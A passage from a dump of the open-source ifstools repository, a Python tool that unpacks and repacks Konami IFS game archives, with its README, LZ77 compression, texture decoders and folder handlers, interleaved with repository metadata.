GenericFile\nfrom .ImageDecoders import cachable_formats\n\nclass TextureList(GenericFile):\n def _load_from_filesystem(self, **kwargs):\n raw = GenericFile._load_from_filesystem(self, **kwargs)\n k = KBinXML(raw)\n # fallback to a type we can encode\n for tex in k.xml_doc.iterchildren():\n if tex.attrib['format'] not in cachable_formats:\n tex.attrib['format'] = 'argb8888rev'\n\n return k.to_binary()\n\nclass ImageCanvas(GenericFile):\n def __init__(self, name, size, images, parent):\n self.name = '_canvas_{}.png'.format(name)\n self._packed_name = self.name\n self.time = parent.time\n self.path = parent.path\n\n self.images = images\n self.img_size = size\n\n def extract(self, base, dump_canvas = False, **kwargs):\n if dump_canvas:\n GenericFile.extract(self, base, **kwargs)\n\n def load(self, draw_bbox = False, **kwargs):\n ''' Makes the canvas.\n This could be far speedier if it copied raw pixels, but that would\n take far too much time to write vs using Image inbuilts '''\n im = Image.new('RGBA', self.img_size)\n draw = None\n if draw_bbox:\n draw = ImageDraw.Draw(im)\n\n for sprite in self.images:\n data = sprite.load()\n sprite_im = Image.open(BytesIO(data))\n\n size = sprite.imgrect\n im.paste(sprite_im, (size[0], size[2]))\n if draw_bbox:\n draw.rectangle((size[0], size[2], size[1], size[3]), outline='red')\n\n del draw\n b = BytesIO()\n im.save(b, format = 'PNG')\n return b.getvalue()\n\n # since it's basically metadata, we ignore similarly to _cache\n def repack(self, manifest, data_blob, tqdm_progress, **kwargs):\n return\n\nclass TexFolder(MD5Folder):\n def __init__(self, ifs_data, obj, parent = None, path = '', name = '', supers = None,\n super_disable = False, super_skip_bad = False, super_abort_if_bad = False):\n MD5Folder.__init__(self, ifs_data, obj, parent, path, name, supers,\n super_disable, super_skip_bad, super_abort_if_bad, 'image', '.png')\n\n def tree_complete(self):\n MD5Folder.tree_complete(self)\n\n if '_cache' in self.folders:\n self.folders.pop('_cache')\n\n if not self.info_kbin:\n return\n\n self.compress = self.info_kbin.xml_doc.attrib.get('compress')\n self.info_file.__class__ = TextureList\n\n self._create_images()\n\n def _create_images(self):\n for tex in self.info_kbin.xml_doc.iterchildren():\n folder = tex.attrib['name']\n fmt = tex.attrib['format']\n canvas_contents = []\n canvas_size = None\n for indiv in tex.iterchildren():\n if indiv.tag == 'size':\n canvas_size = self._split_ints(indiv.text)\n elif indiv.tag == 'image':\n name = indiv.attrib['name'] + '.png'\n if name in self.files:\n ImageFile.upgrade_generic(self.files[name], indiv, fmt, self.compress)\n canvas_contents.append(self.files[name])\n else:\n tqdm.write('Unknown texturelist.xml element {}'.format(indiv.tag))\n canvas = ImageCanvas(folder, canvas_size, canvas_contents, self)\n self.files[canvas.name] = canvas\n" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.5516178607940674, "avg_line_length": 23.961538314819336, "blob_id": "776ef5fe40eb45ca359ecd0d1065e0ef32b30004", "content_id": "90ce88ff1cf3b0bd10eabc7c9a18c1432f0ef3f2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 649, "license_type": "permissive", "max_line_length": 51, "num_lines": 26, "path": "/ifstools/utils.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "import errno\nimport os\n\ndef mkdir_silent(dir):\n try: # python 3\n FileExistsError\n try:\n os.mkdir(dir)\n except FileExistsError:\n pass\n except NameError: # python 2\n try:\n os.mkdir(dir)\n except OSError as e:\n if e.errno == errno.EEXIST:\n pass\n else:\n raise\n\ndef save_with_timestamp(filename, data, timestamp):\n mkdir_silent(os.path.dirname(filename))\n with open(filename, 'wb') as f:\n f.write(data)\n # we store invalid timestamps as -1\n if timestamp >= 0:\n os.utime(filename, (timestamp,timestamp))\n" }, { "alpha_fraction": 0.6126697063446045, "alphanum_fraction": 0.6147813200950623, "avg_line_length": 41.6184196472168, "blob_id": "a3c04ff3714e3f69eabcca2d24c446ac057f144c", "content_id": "9ef59bd3c641884dfb6f256cfe21bb0140be32f4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3315, "license_type": "permissive", "max_line_length": 96, "num_lines": 76, "path": "/README.md", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "# ifstools\r\nExtractor for Konmai IFS files.\r\n\r\n## Features\r\n- Converts all textures to png without requiring a second program\r\n- Repacks without ingame display issues\r\n- Multithreaded recompression\r\n- Only changed textures are recompressed, the rest are cached\r\n- Works on eacloud music ifs files\r\n- Correctly names files under `afp`, `bsi` and `geo` folders\r\n- Converts internal binary xmls to plaintext, to facilitate further experimentation.\r\n- Dumps the ifs manifest so you can explore the format\r\n\r\n## Install\r\nJust want an exe? [Download the latest](https://github.com/mon/ifstools/releases).\r\n\r\nHave Python installed? Do this:\r\n`pip install ifstools` \r\nThen run `ifstools` from anywhere in a command prompt.\r\n\r\n## Usage\r\n```\r\nusage: ifstools [-h] [-e] [-y] [-o OUT_DIR] [--tex-only] [-c]\r\n [--bounds] [--uv] [--no-cache] [-m] [-s] [-r]\r\n file_to_unpack.ifs|folder_to_repack_ifs\r\n [file_to_unpack.ifs|folder_to_repack_ifs ...]\r\n\r\nUnpack/pack IFS files and textures\r\n\r\npositional arguments:\r\n file_to_unpack.ifs|folder_to_repack_ifs\r\n files/folders to process. Files will be unpacked,\r\n folders will be repacked\r\n\r\noptional arguments:\r\n -h, --help show this help message and exit\r\n -e, --extract-folders\r\n do not repack folders, instead unpack any IFS files\r\n inside them\r\n -y don't prompt for file/folder overwrite\r\n -o OUT_DIR output directory\r\n --tex-only only extract textures\r\n -c, --canvas dump the image canvas as defined by the\r\n texturelist.xml in _canvas.png\r\n --bounds draw image bounds on the exported canvas in red\r\n --uv crop images to uvrect (usually 1px smaller than\r\n imgrect). Forces --tex-only\r\n --no-cache ignore texture cache, recompress all\r\n --rename-dupes if two files have the same name but differing case\r\n (A.png vs a.png) rename the second as \"a (1).png\" to\r\n allow both to be extracted on Windows\r\n -m, --extract-manifest\r\n extract the IFS manifest for inspection\r\n --super-disable only extract files unique to this IFS, do not follow\r\n \"super\" parent references at all\r\n --super-skip-bad if a \"super\" IFS reference has a checksum mismatch, do\r\n not extract it\r\n --super-abort-if-bad if a \"super\" IFS reference has a checksum mismatch,\r\n cancel and display an error\r\n -s, --silent don't display files as they are processed\r\n -r, --norecurse if file contains another IFS, don't extract its\r\n contents\r\n```\r\n\r\n## Build an exe\r\n`pip install pyinstaller` \r\n`pyinstaller ifstools_bin.py --onefile -n ifstools` \r\nRecommend doing this in a fresh venv so the module finder doesn't include more than required.\r\n\r\nNotes:\r\n- dxt5 texture repacking is not fully supported - they will silently be converted to argb8888rev\r\n\r\nTodo:\r\n- Recursive repacking for ifs inside ifs\r\n\r\nI hope the rest is self explanatory. Confused? Create a new issue and tell me what docs to add.\r\n" }, { "alpha_fraction": 0.5155590772628784, "alphanum_fraction": 0.5327004194259644, "avg_line_length": 30.86554527282715, "blob_id": "2a0574aa7bcbfbe6b907418a3ee66eab82c850c0", "content_id": "a06418c8cf0a1608fb5f8160bc067dfa2733cc74", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3792, "license_type": "permissive", "max_line_length": 86, "num_lines": 119, "path": "/ifstools/handlers/lz77.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "# consistency with py 2/3\nfrom builtins import bytes\nfrom struct import unpack, pack\nfrom io import BytesIO\n\nfrom tqdm import tqdm\n\nWINDOW_SIZE = 0x1000\nWINDOW_MASK = WINDOW_SIZE - 1\nTHRESHOLD = 3\nINPLACE_THRESHOLD = 0xA\nLOOK_RANGE = 0x200\nMAX_LEN = 0xF + THRESHOLD\n\ndef decompress(input):\n input = BytesIO(input)\n decompressed = bytearray()\n\n while True:\n # wrap in bytes for py2\n flag = bytes(input.read(1))[0]\n for i in range(8):\n if (flag >> i) & 1 == 1:\n decompressed.append(input.read(1)[0])\n else:\n w = unpack('>H', input.read(2))[0]\n position = (w >> 4)\n length = (w & 0x0F) + THRESHOLD\n if position == 0:\n return bytes(decompressed)\n\n if position > len(decompressed):\n diff = position - len(decompressed)\n diff = min(diff, length)\n decompressed.extend([0]*diff)\n length -= diff\n # optimise\n if -position+length < 0:\n decompressed.extend(decompressed[-position:-position+length])\n else:\n for loop in range(length):\n decompressed.append(decompressed[-position])\n\ndef match_window(in_data, offset):\n '''Find the longest match for the string starting at offset in the preceeding data\n '''\n window_start = max(offset - WINDOW_MASK, 0)\n\n for n in range(MAX_LEN, THRESHOLD-1, -1):\n window_end = min(offset + n, len(in_data))\n # we've not got enough data left for a meaningful result\n if window_end - offset < THRESHOLD:\n return None\n str_to_find = in_data[offset:window_end]\n idx = in_data.rfind(str_to_find, window_start, window_end-n)\n if idx != -1:\n code_offset = offset - idx # - 1\n code_len = len(str_to_find)\n return (code_offset, code_len)\n\n return None\n\ndef compress(input, progress = False):\n pbar = tqdm(total = len(input), leave = False, unit = 'b', unit_scale = True,\n desc = 'Compressing', disable = not progress)\n compressed = bytearray()\n input = bytes([0]*WINDOW_SIZE) + bytes(input)\n input_size = len(input)\n current_pos = WINDOW_SIZE\n bit = 0\n while current_pos < input_size:\n flag_byte = 0;\n buf = bytearray()\n for _ in range(8):\n if current_pos >= input_size:\n bit = 0;\n else:\n match = match_window(input, current_pos)\n if match:\n pos, length = match\n info = (pos << 4) | ((length - THRESHOLD) & 0x0F)\n buf.extend(pack('>H', info))\n bit = 0\n current_pos += length\n pbar.update(length)\n else:\n buf.append(input[current_pos])\n current_pos += 1\n pbar.update(1)\n bit = 1\n flag_byte = (flag_byte >> 1) | ((bit & 1) << 7)\n compressed.append(flag_byte)\n compressed.extend(buf)\n compressed.append(0)\n compressed.append(0)\n compressed.append(0)\n\n pbar.close()\n return bytes(compressed)\n\ndef compress_dummy(input):\n input_length = len(input)\n compressed = bytearray()\n\n extra_bytes = input_length % 8\n\n for i in range(0, input_length-extra_bytes, 8):\n compressed.append(0xFF)\n compressed.extend(input[i:i+8])\n\n if extra_bytes > 0:\n compressed.append(0xFF >> (8 - extra_bytes))\n compressed.extend(input[-extra_bytes:])\n\n compressed.append(0)\n compressed.append(0)\n compressed.append(0)\n\n return bytes(compressed)\n" }, { "alpha_fraction": 0.7297297120094299, "alphanum_fraction": 0.7837837934494019, "avg_line_length": 6.400000095367432, "blob_id": "f86d8a001bdfb48f52033a2cdbeb3a04aeb4e58a", "content_id": "e57c90af7d867c9a0897620422ac74c8a0dfcb29", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 37, "license_type": "permissive", "max_line_length": 12, "num_lines": 5, "path": "/requirements.txt", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "lxml\ntqdm\npillow\nfuture\nkbinxml>=1.5\n" }, { "alpha_fraction": 0.5206963419914246, "alphanum_fraction": 0.6263055801391602, "avg_line_length": 35.92856979370117, "blob_id": "8719b938ef6bb55061f1f72396f6d074bccb134e", "content_id": "60d7d4fca94001cdb1dbe219b9fa8b232a4c7097", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2585, "license_type": "permissive", "max_line_length": 92, "num_lines": 70, "path": "/ifstools/handlers/ImageDecoders.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from io import BytesIO\nfrom struct import unpack, pack\n\nfrom PIL import Image\nfrom tqdm import tqdm\n\n# header for a standard DDS with DXT5 compression and RGBA pixels\n# gap placed for image height/width insertion\ndxt_start = b'DDS |\\x00\\x00\\x00\\x07\\x10\\x00\\x00'\n\ndxt_middle = b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + \\\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + \\\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + \\\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \\x00\\x00\\x00\\x04' + \\\n b'\\x00\\x00\\x00'\n\ndxt_end = b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + \\\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00' + \\\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n\ndef check_size(ifs_img, data, bytes_per_pixel):\n need = ifs_img.img_size[0] * ifs_img.img_size[1] * bytes_per_pixel\n if len(data) < need:\n tqdm.write('WARNING: Not enough image data for {}, padding'.format(ifs_img.name))\n data += b'\\x00' * (need-len(data))\n return data\n\ndef decode_argb8888rev(ifs_img, data):\n data = check_size(ifs_img, data, 4)\n return Image.frombytes('RGBA', ifs_img.img_size, data, 'raw', 'BGRA')\n\ndef encode_argb8888rev(ifs_img, image):\n return image.tobytes('raw', 'BGRA')\n\ndef decode_argb4444(ifs_img, data):\n data = check_size(ifs_img, data, 2)\n im = Image.frombytes('RGBA', ifs_img.img_size, data, 'raw', 'RGBA;4B')\n # there's no BGRA;4B\n r, g, b, a = im.split()\n return Image.merge('RGBA', (b, g, r, a))\n\ndef decode_dxt(ifs_img, data, version):\n b = BytesIO()\n b.write(dxt_start)\n b.write(pack('<2I', ifs_img.img_size[1], ifs_img.img_size[0]))\n b.write(dxt_middle)\n b.write(version)\n b.write(dxt_end)\n # the data has swapped endianness for every WORD\n l = len(data)//2\n big = unpack('>{}H'.format(l), data)\n little = pack('<{}H'.format(l), *big)\n b.write(little)\n return Image.open(b)\n\ndef decode_dxt5(ifs_img, data):\n return decode_dxt(ifs_img, data, b'DXT5')\n\ndef decode_dxt1(ifs_img, data):\n return decode_dxt(ifs_img, data, b'DXT1')\n\n\nimage_formats = {\n 'argb8888rev' : {'decoder': decode_argb8888rev, 'encoder': encode_argb8888rev},\n 'argb4444' : {'decoder': decode_argb4444, 'encoder': None},\n 'dxt1' : {'decoder': decode_dxt1, 'encoder': None},\n 'dxt5' : {'decoder': decode_dxt5, 'encoder': None},\n}\n\ncachable_formats = [key for key, val in image_formats.items() if val['encoder'] is not None]\n" }, { "alpha_fraction": 0.5880597233772278, "alphanum_fraction": 0.5945273637771606, "avg_line_length": 36.22222137451172, "blob_id": "18f3845c028d02a7e6e6f43511ccc2f26d91af08", "content_id": "0dc8e531cd31b37a3597cf2e9bd36220e9905cba", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2010, "license_type": "permissive", "max_line_length": 100, "num_lines": 54, "path": "/ifstools/handlers/MD5Folder.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from hashlib import md5\n\nfrom kbinxml import KBinXML\n\nfrom . import GenericFolder\n\nclass MD5Folder(GenericFolder):\n\n def __init__(self, ifs_data, parent, obj, path = '', name = '', supers = None,\n super_disable = False, super_skip_bad = False,\n super_abort_if_bad = False, md5_tag = None, extension = None):\n GenericFolder.__init__(self, ifs_data, parent, obj, path, name, supers,\n super_disable, super_skip_bad, super_abort_if_bad)\n self.md5_tag = md5_tag if md5_tag else self.name\n self.extension = extension\n\n def tree_complete(self):\n GenericFolder.tree_complete(self)\n\n self.info_kbin = None\n self.info_file = None\n for filename, file in self.files.items():\n if filename.endswith('.xml'):\n self.info_file = file\n break\n if not self.info_file:\n #raise KeyError('MD5 folder contents have no mapping xml')\n # _super_ references to info XML breaks things - just extract what we can\n return\n\n self.info_kbin = KBinXML(self.info_file.load(convert_kbin = False))\n self._apply_md5()\n\n def _apply_md5(self):\n # findall needs xpath or it'll only search direct children\n names = (tag.attrib['name'] for tag in self.info_kbin.xml_doc.findall('.//' + self.md5_tag))\n self._apply_md5_folder(names, self)\n\n def _apply_md5_folder(self, plain_list, folder):\n for plain in plain_list:\n hashed = md5(plain.encode(self.info_kbin.encoding)).hexdigest()\n\n if self.extension:\n plain += self.extension\n\n # add correct packed name to deobfuscated filesystems\n if plain in folder.files:\n folder.files[plain]._packed_name = hashed\n\n # deobfuscate packed filesystems\n if hashed in folder.files:\n orig = folder.files.pop(hashed)\n orig.name = plain\n folder.files[plain] = orig\n" }, { "alpha_fraction": 0.8085106611251831, "alphanum_fraction": 0.8085106611251831, "avg_line_length": 14.666666984558105, "blob_id": "9bcc3ec89497ea05b3d28e97c23238214e696f93", "content_id": "53a75dfbaff34cac8d30e42a6504bec11d727108", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "permissive", "max_line_length": 29, "num_lines": 3, "path": "/ifstools_bin.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from ifstools import ifstools\n\nifstools.main()\n" }, { "alpha_fraction": 0.5551425218582153, "alphanum_fraction": 0.5625774264335632, "avg_line_length": 34.08695602416992, "blob_id": "ae5e5db819ced9a9c7f1fe03bc82af11f7744c9a", "content_id": "1bf06f7dbb0d42510b39e1eae592529a6c849f4e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 807, "license_type": "permissive", "max_line_length": 73, "num_lines": 23, "path": "/ifstools/handlers/AfpFolder.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from . import MD5Folder\n\nclass AfpFolder(MD5Folder):\n\n def tree_complete(self):\n MD5Folder.tree_complete(self)\n if not self.info_kbin:\n return\n\n # findall needs xpath or it'll only search direct children\n names = []\n geo_names = []\n for tag in self.info_kbin.xml_doc.findall('.//' + self.md5_tag):\n name = tag.attrib['name']\n names.append(name)\n for geo in tag.findall('geo'):\n for shape in self._split_ints(geo.text):\n geo_names.append('{}_shape{}'.format(name, shape))\n\n if 'bsi' in self.folders:\n self._apply_md5_folder(names, self.folders['bsi'])\n if 'geo' in self.parent.folders:\n self._apply_md5_folder(geo_names, self.parent.folders['geo'])\n" }, { "alpha_fraction": 0.5792483687400818, "alphanum_fraction": 0.584967315196991, "avg_line_length": 31.210525512695312, "blob_id": "798607cd2d10c24cb5fc9c1d696c779c68ecfac2", "content_id": "3901f1cd5bcb807f409881b5cbc5b3620b738ac4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2448, "license_type": "permissive", "max_line_length": 87, "num_lines": 76, "path": "/ifstools/handlers/GenericFile.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "import os\n\nfrom kbinxml import KBinXML\nimport lxml.etree as etree\n\nfrom .Node import Node\nfrom .. import utils\n\nclass GenericFile(Node):\n def from_xml(self, element):\n info = self._split_ints(element.text)\n # sometimes we don't get a timestamp\n if len(info) == 2:\n self.start, self.size = info\n self.time = -1\n else:\n self.start, self.size, self.time = info\n\n def from_filesystem(self, folder):\n self.base_path = self.parent.base_path\n self.time = int(os.path.getmtime(self.disk_path))\n self.start = self.size = None\n\n def extract(self, base, **kwargs):\n data = self.load(**kwargs)\n path = os.path.join(base, self.full_path)\n utils.save_with_timestamp(path, data, self.time)\n\n def load(self, **kwargs):\n if self.from_ifs:\n return self._load_from_ifs(**kwargs)\n else:\n return self._load_from_filesystem(**kwargs)\n\n def _load_from_ifs(self, convert_kbin = True, **kwargs):\n data = self.ifs_data.get(self.start, self.size)\n\n if convert_kbin and self.name.endswith('.xml') and KBinXML.is_binary_xml(data):\n data = KBinXML(data).to_text().encode('utf8')\n return data\n\n def _load_from_filesystem(self, **kwargs):\n with open(self.disk_path, 'rb') as f:\n ret = f.read()\n self.size = len(ret)\n return ret\n\n @property\n def needs_preload(self):\n return False\n\n def preload(self, **kwargs):\n pass\n\n def repack(self, manifest, data_blob, tqdm_progress, **kwargs):\n if tqdm_progress:\n tqdm_progress.write(self.full_path)\n tqdm_progress.update(1)\n elem = etree.SubElement(manifest, self.packed_name)\n elem.attrib['__type'] = '3s32'\n data = self.load(convert_kbin = False, **kwargs)\n if self.name.endswith('.xml') and not KBinXML.is_binary_xml(data):\n data = KBinXML(data).to_binary()\n # offset, size, timestamp\n elem.text = '{} {} {}'.format(len(data_blob.getvalue()), len(data), self.time)\n data_blob.write(data)\n # 16 byte alignment\n align = len(data) % 16\n if align:\n data_blob.write(b'\\0' * (16-align))\n\n @property\n def disk_path(self):\n if self.from_ifs:\n raise Exception('disk_path invalid for IFS file')\n return os.path.join(self.base_path, self.full_path)\n" }, { "alpha_fraction": 0.5557634830474854, "alphanum_fraction": 0.5658682584762573, "avg_line_length": 33.92156982421875, "blob_id": "6334e62abf7faabd6c48e73f83ffb905e1a338ed", "content_id": "c9c775ae191293c3882c5e94d007d13b18544a38", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5344, "license_type": "permissive", "max_line_length": 114, "num_lines": 153, "path": "/ifstools/handlers/ImageFile.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from io import BytesIO\nfrom struct import unpack, pack\nfrom os.path import getmtime, isfile, join, dirname\nfrom os import utime, mkdir\nimport errno\n\nfrom PIL import Image\nimport lxml.etree as etree\nfrom kbinxml import KBinXML\n\nfrom . import GenericFile\nfrom . import lz77\nfrom .ImageDecoders import image_formats, cachable_formats\nfrom .. import utils\n\nclass ImageFile(GenericFile):\n def __init__(self, ifs_data, obj, parent = None, path = '', name = ''):\n raise Exception('ImageFile must be instantiated from existing GenericFile with ImageFile.upgrade_generic')\n\n @classmethod\n def upgrade_generic(cls, gen_file, image_elem, fmt, compress):\n self = gen_file\n self.__class__ = cls\n\n self.format = fmt\n self.compress = compress\n\n # all values are multiplied by 2, odd values have never been seen\n self.uvrect = [x//2 for x in self._split_ints(image_elem.find('uvrect').text)]\n self.imgrect = [x//2 for x in self._split_ints(image_elem.find('imgrect').text)]\n self.img_size = (\n self.imgrect[1]-self.imgrect[0],\n self.imgrect[3]-self.imgrect[2]\n )\n self.uv_size = (\n self.uvrect[1]-self.uvrect[0],\n self.uvrect[3]-self.uvrect[2]\n )\n\n def extract(self, base, use_cache = True, **kwargs):\n GenericFile.extract(self, base, **kwargs)\n\n if use_cache and self.compress and self.from_ifs and self.format in cachable_formats:\n self.write_cache(GenericFile._load_from_ifs(self, **kwargs), base)\n\n def _load_from_ifs(self, crop_to_uvrect = False, **kwargs):\n data = GenericFile._load_from_ifs(self, **kwargs)\n\n if self.compress == 'avslz':\n uncompressed_size = unpack('>I', data[:4])[0]\n compressed_size = unpack('>I', data[4:8])[0]\n # sometimes the headers are missing: not actually compressed\n # The 2 extra u32 are moved to the end of the file\n # Quality file format.\n if len(data) == compressed_size + 8:\n data = data[8:]\n data = lz77.decompress(data)\n assert len(data) == uncompressed_size\n else:\n data = data[8:] + data[:8]\n\n if self.format in image_formats:\n decoder = image_formats[self.format]['decoder']\n im = decoder(self, data)\n else:\n raise NotImplementedError('Unknown format {}'.format(self.format))\n\n if crop_to_uvrect:\n start_x = self.uvrect[0] - self.imgrect[0]\n start_y = self.uvrect[2] - self.imgrect[2]\n dims = (\n start_x,\n start_y,\n start_x + self.uv_size[0],\n start_y + self.uv_size[1],\n )\n im = im.crop(dims)\n\n b = BytesIO()\n im.save(b, format = 'PNG')\n return b.getvalue()\n\n def repack(self, manifest, data_blob, tqdm_progress, **kwargs):\n if tqdm_progress:\n tqdm_progress.write(self.full_path)\n tqdm_progress.update(1)\n\n if self.compress == 'avslz':\n data = self.read_cache()\n else:\n data = self._load_im()\n\n # offset, size, timestamp\n elem = etree.SubElement(manifest, self.packed_name)\n elem.attrib['__type'] = '3s32'\n elem.text = '{} {} {}'.format(len(data_blob.getvalue()), len(data), self.time)\n data_blob.write(data)\n # 16 byte alignment\n align = len(data) % 16\n if align:\n data_blob.write(b'\\0' * (16-align))\n\n def _load_im(self):\n data = self.load()\n\n im = Image.open(BytesIO(data))\n if im.mode != 'RGBA':\n im = im.convert('RGBA')\n\n if self.format in image_formats:\n encoder = image_formats[self.format]['encoder']\n if encoder is None:\n # everything else becomes argb8888rev\n encoder = image_formats['argb8888rev']['encoder']\n data = encoder(self, im)\n else:\n raise NotImplementedError('Unknown format {}'.format(self.format))\n\n return data\n\n @property\n def needs_preload(self):\n cache = join(dirname(self.disk_path), '_cache', self._packed_name)\n if isfile(cache):\n mtime = int(getmtime(cache))\n if self.time <= mtime:\n return False\n return True\n\n def preload(self, use_cache = True, tex_suffix = None, **kwargs):\n if not self.needs_preload and use_cache:\n return\n # Not cached/out of date, compressing\n data = self._load_im()\n uncompressed_size = len(data)\n data = lz77.compress(data)\n compressed_size = len(data)\n data = pack('>I', uncompressed_size) + pack('>I', compressed_size) + data\n self.write_cache(data)\n\n def write_cache(self, data, base = None):\n if not self.from_ifs:\n base = self.base_path\n cache = join(base, self.path, '_cache', self._packed_name)\n utils.mkdir_silent(dirname(cache))\n with open(cache, 'wb') as f:\n f.write(data)\n utime(cache, (self.time, self.time))\n\n def read_cache(self):\n cache = join(dirname(self.disk_path), '_cache', self._packed_name)\n with open(cache, 'rb') as f:\n return f.read()\n\n" }, { "alpha_fraction": 0.8247422575950623, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 31.33333396911621, "blob_id": "8cc4cea8ca01b0744043c269fd8e8fa936f46577", "content_id": "fcb007af58ae907f07e57f965abbf3115f457e91", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 97, "license_type": "permissive", "max_line_length": 48, "num_lines": 3, "path": "/ifstools/__init__.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from .ifstools import main\nfrom .ifs import IFS\nfrom .handlers import GenericFolder, GenericFile\n" }, { "alpha_fraction": 0.8346773982048035, "alphanum_fraction": 0.8427419066429138, "avg_line_length": 26.55555534362793, "blob_id": "ac256b7cb2a70049068f0ef11cf26dfcfaa4f48c", "content_id": "3320ceb48ca2efd973ebd05d6d0b11fe33664574", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 248, "license_type": "permissive", "max_line_length": 45, "num_lines": 9, "path": "/ifstools/handlers/__init__.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from .Node import Node\n\nfrom .GenericFile import GenericFile\nfrom .ImageFile import ImageFile\n\nfrom .GenericFolder import GenericFolder\nfrom .MD5Folder import MD5Folder\nfrom .AfpFolder import AfpFolder\nfrom .TexFolder import TexFolder, ImageCanvas\n" }, { "alpha_fraction": 0.5277777910232544, "alphanum_fraction": 0.5319148898124695, "avg_line_length": 23.507246017456055, "blob_id": "e8e326256e8de7e5996dc83f32b2bf1b852701f2", "content_id": "27d3583640d8ec3aa2f312bec02f78c277ea058c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1692, "license_type": "permissive", "max_line_length": 81, "num_lines": 69, "path": "/ifstools/handlers/Node.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "import os\n\nimport lxml.etree as etree\n\nescapes = [\n ('_E', '.'),\n ('__', '_'),\n]\n\nclass Node(object):\n\n def __init__(self, ifs_data, obj, parent = None, path = '', name = ''):\n self.ifs_data = ifs_data\n self.parent = parent\n self.path = path\n self.name = name\n # xml sanitisation performed by the property\n self._packed_name = name\n self.time = None\n if isinstance(obj, etree._Element):\n self.from_ifs = True\n self.from_xml(obj)\n else:\n self.from_ifs = False\n self.from_filesystem(obj)\n\n def from_xml(self, elem):\n raise NotImplementedError\n\n def from_filesystem(self, path):\n raise NotImplementedError\n\n def tree_complete(self):\n '''Call this when the entire tree is parsed and ready for modification'''\n pass\n\n def __str__(self):\n return os.path.join(self.path, self.name)\n\n def __repr__(self):\n return '<{}: {}>'.format(self.__class__.__name__, self.full_path)\n\n @property\n def packed_name(self):\n return self.sanitize_name(self._packed_name)\n\n @property\n def full_path(self):\n return os.path.join(self.path, self.name)\n\n @staticmethod\n def sanitize_name(n):\n for e in escapes[::-1]:\n n = n.replace(e[1], e[0])\n if n[0].isdigit():\n n = '_' + n\n return n\n\n @staticmethod\n def fix_name(n):\n for e in escapes:\n n = n.replace(*e)\n if n[0] == '_' and n[1].isdigit():\n n = n[1:]\n return n\n\n @staticmethod\n def _split_ints(text, delim = ' '):\n return list(map(int, text.split(delim)))\n\n" }, { "alpha_fraction": 0.5428440570831299, "alphanum_fraction": 0.5462043881416321, "avg_line_length": 39.66459655761719, "blob_id": "a036338c73c42353720373c6d0900a84614f84a7", "content_id": "acf88ef76299e41d937bd197a399e478bc11cb49", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6547, "license_type": "permissive", "max_line_length": 138, "num_lines": 161, "path": "/ifstools/handlers/GenericFolder.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from itertools import chain\nfrom os.path import getmtime, basename, dirname, join, realpath, isfile\nfrom collections import OrderedDict\n\nimport lxml.etree as etree\nfrom tqdm import tqdm\n\nfrom . import GenericFile\nfrom .Node import Node\n\nclass GenericFolder(Node):\n\n def __init__(self, ifs_data, obj, parent = None, path = '', name = '',\n supers = None, super_disable = False, super_skip_bad = False,\n super_abort_if_bad = False):\n # circular dependencies mean we import here\n from . import AfpFolder, TexFolder\n self.folder_handlers = {\n 'afp' : AfpFolder,\n 'tex' : TexFolder,\n }\n self.supers = supers if supers else []\n self.super_disable = super_disable\n self.super_skip_bad = super_skip_bad\n self.super_abort_if_bad = super_abort_if_bad\n Node.__init__(self, ifs_data, obj, parent, path, name)\n\n file_handler = GenericFile\n\n def from_xml(self, element):\n if element.text:\n self.time = 